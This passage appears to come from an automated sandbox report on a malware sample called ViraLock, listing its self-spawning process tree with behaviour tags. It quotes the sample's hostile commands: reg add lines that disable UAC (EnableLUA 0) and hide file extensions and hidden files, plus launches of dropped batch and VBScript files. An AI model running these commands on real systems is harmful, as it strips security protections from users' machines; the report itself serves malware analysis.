        C:\Users\Admin\Downloads\ViraLock
        20⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:10820
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        21⤵
        
        PID:16584
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        22⤵
        Executes dropped EXE
        
        PID:30532
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        23⤵
        
        PID:15348
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        24⤵
        Executes dropped EXE
        
        PID:13412
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        25⤵
        System Location Discovery: System Language Discovery
        
        PID:12116
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        26⤵
        Executes dropped EXE
        
        PID:12404
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        27⤵
        
        PID:17844
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        28⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:17964
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        29⤵
        
        PID:29264
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        30⤵
        Executes dropped EXE
        
        PID:29428
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        31⤵
        
        PID:16132
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        32⤵
        Executes dropped EXE
        
        PID:15776
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        33⤵
        
        PID:19304
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        34⤵
        Executes dropped EXE
        
        PID:14572
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        35⤵
        
        PID:19052
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        36⤵
        Executes dropped EXE
        
        PID:10588
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        37⤵
        
        PID:9584
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        38⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:13648
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        39⤵
        System Location Discovery: System Language Discovery
        
        PID:9864
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        40⤵
        Executes dropped EXE
        
        PID:18852
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        41⤵
        
        PID:17220
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        42⤵
        Executes dropped EXE
        
        PID:15220
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        43⤵
        System Location Discovery: System Language Discovery
        
        PID:12560
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        44⤵
        Executes dropped EXE
        
        PID:14040
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        45⤵
        
        PID:7760
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        46⤵
        Executes dropped EXE
        
        PID:15376
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        47⤵
        System Location Discovery: System Language Discovery
        
        PID:29260
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        48⤵
        Executes dropped EXE
        
        PID:17984
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        49⤵
        
        PID:19092
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        50⤵
        Executes dropped EXE
        
        PID:10832
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        51⤵
        
        PID:7636
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        52⤵
        Executes dropped EXE
        
        PID:14504
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        53⤵
        
        PID:21816
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        54⤵
        Executes dropped EXE
        
        PID:6680
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        55⤵
        
        PID:19376
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        56⤵
        Executes dropped EXE
        
        PID:14052
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        57⤵
        
        PID:15812
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        58⤵
        Executes dropped EXE
        
        PID:22052
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        59⤵
        
        PID:15828
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        60⤵
        Executes dropped EXE
        
        PID:3704
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        61⤵
        
        PID:8764
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        62⤵
        Executes dropped EXE
        
        PID:9908
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        63⤵
        
        PID:16200
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        64⤵
        Executes dropped EXE
        
        PID:22284
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        65⤵
        
        PID:12416
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        66⤵
        Executes dropped EXE
        
        PID:14392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        67⤵
        
        PID:10580
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        68⤵
        Executes dropped EXE
        
        PID:16284
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        69⤵
        
        PID:8752
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        70⤵
        Executes dropped EXE
        
        PID:11864
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        71⤵
        System Location Discovery: System Language Discovery
        
        PID:19772
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        72⤵
        Executes dropped EXE
        
        PID:20924
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        73⤵
        System Location Discovery: System Language Discovery
        
        PID:16376
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        74⤵
        Executes dropped EXE
        
        PID:16096
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        75⤵
        
        PID:23476
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        76⤵
        Executes dropped EXE
        
        PID:23576
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        77⤵
        
        PID:19688
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        78⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:20080
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        79⤵
        
        PID:20492
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        80⤵
        Executes dropped EXE
        
        PID:20568
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        81⤵
        System Location Discovery: System Language Discovery
        
        PID:21340
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        82⤵
        Executes dropped EXE
        
        PID:21444
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        83⤵
        
        PID:22300
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        84⤵
        
        PID:23840
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        85⤵
        
        PID:23692
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        86⤵
        System Location Discovery: System Language Discovery
        
        PID:23936
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        87⤵
        
        PID:24704
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        88⤵
        
        PID:24756
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        89⤵
        
        PID:24504
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        90⤵
        
        PID:24100
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        91⤵
        System Location Discovery: System Language Discovery
        
        PID:23520
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        92⤵
        
        PID:23344
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        93⤵
        
        PID:22592
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        94⤵
        
        PID:23308
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        95⤵
        
        PID:22092
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        96⤵
        
        PID:21748
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        97⤵
        
        PID:21400
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        98⤵
        
        PID:21056
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        99⤵
        
        PID:20784
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        100⤵
        
        PID:26408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        101⤵
        
        PID:25036
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        102⤵
        
        PID:20264
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        103⤵
        
        PID:19860
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        104⤵
        
        PID:24816
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        105⤵
        
        PID:26468
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        106⤵
        
        PID:25460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        107⤵
        
        PID:25836
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        108⤵
        
        PID:26328
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        109⤵
        
        PID:25964
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        110⤵
        
        PID:26028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        111⤵
        System Location Discovery: System Language Discovery
        
        PID:26420
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        112⤵
        
        PID:27252
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        113⤵
        
        PID:27524
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        113⤵
        Modifies visibility of file extensions in Explorer
        
        PID:176
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        113⤵
        
        PID:27532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        113⤵
        UAC bypass
        
        PID:27460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eoEMMQwA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        113⤵
        
        PID:27608
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        114⤵
        
        PID:27432
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        111⤵
        Modifies visibility of file extensions in Explorer
        
        PID:26620
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        111⤵
        
        PID:26556
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        111⤵
        UAC bypass
        Modifies registry key
        
        PID:26700
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vKIIMgog.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        111⤵
        
        PID:26720
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        112⤵
        
        PID:27324
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        109⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:26016
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        109⤵
        
        PID:26036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        109⤵
        UAC bypass
        
        PID:26044
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CQMssIMA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        109⤵
        
        PID:26056
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        110⤵
        
        PID:26696
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        107⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        
        PID:25552
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        107⤵
        
        PID:25604
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        107⤵
        UAC bypass
        
        PID:25584
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pQkYIcIU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        107⤵
        
        PID:25620
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        108⤵
        
        PID:25920
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        105⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:25092
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        105⤵
        Modifies registry key
        
        PID:25100
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        105⤵
        UAC bypass
        
        PID:25108
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lekYYsEc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        105⤵
        System Location Discovery: System Language Discovery
        
        PID:25120
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        106⤵
        
        PID:25428
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        103⤵
        Modifies visibility of file extensions in Explorer
        
        PID:24812
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        103⤵
        
        PID:24836
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        103⤵
        UAC bypass
        Modifies registry key
        
        PID:24840
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OyEEcoIg.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        103⤵
        
        PID:24904
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        104⤵
        
        PID:25188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        101⤵
        Modifies visibility of file extensions in Explorer
        
        PID:20328
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        101⤵
        
        PID:20312
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        101⤵
        UAC bypass
        
        PID:20288
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zggwgEck.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        101⤵
        
        PID:20232
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        102⤵
        
        PID:19932
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        99⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:26436
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        99⤵
        System Location Discovery: System Language Discovery
        
        PID:26452
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        99⤵
        UAC bypass
        Modifies registry key
        
        PID:26472
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aKkossUA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        99⤵
        
        PID:25568
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        100⤵
        
        PID:20488
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        97⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:21360
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        97⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:21372
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        97⤵
        UAC bypass
        Modifies registry key
        
        PID:21268
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZsYckksQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        97⤵
        
        PID:21152
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        98⤵
        System Location Discovery: System Language Discovery
        
        PID:20892
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        95⤵
        Modifies visibility of file extensions in Explorer
        
        PID:21996
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        95⤵
        Modifies registry key
        
        PID:21972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        95⤵
        UAC bypass
        Modifies registry key
        
        PID:21952
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gWQkkoUo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        95⤵
        
        PID:21900
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        96⤵
        
        PID:21472
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        93⤵
        Modifies visibility of file extensions in Explorer
        
        PID:22400
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        93⤵
        
        PID:22332
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        93⤵
        UAC bypass
        
        PID:22364
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vQIoIogQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        93⤵
        System Location Discovery: System Language Discovery
        
        PID:22424
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        94⤵
        
        PID:22220
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        91⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        
        PID:23276
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        91⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:23188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        91⤵
        UAC bypass
        Modifies registry key
        
        PID:23212
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lssgskkk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        91⤵
        
        PID:23148
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        92⤵
        
        PID:22752
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        89⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:24076
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        89⤵
        
        PID:24056
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        89⤵
        UAC bypass
        
        PID:24012
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qKMIkEcw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        89⤵
        
        PID:23928
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        90⤵
        
        PID:23660
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        87⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:24708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        87⤵
        Modifies registry key
        
        PID:24652
        
        C:\Windows\SysWOW64\reg.exe
        
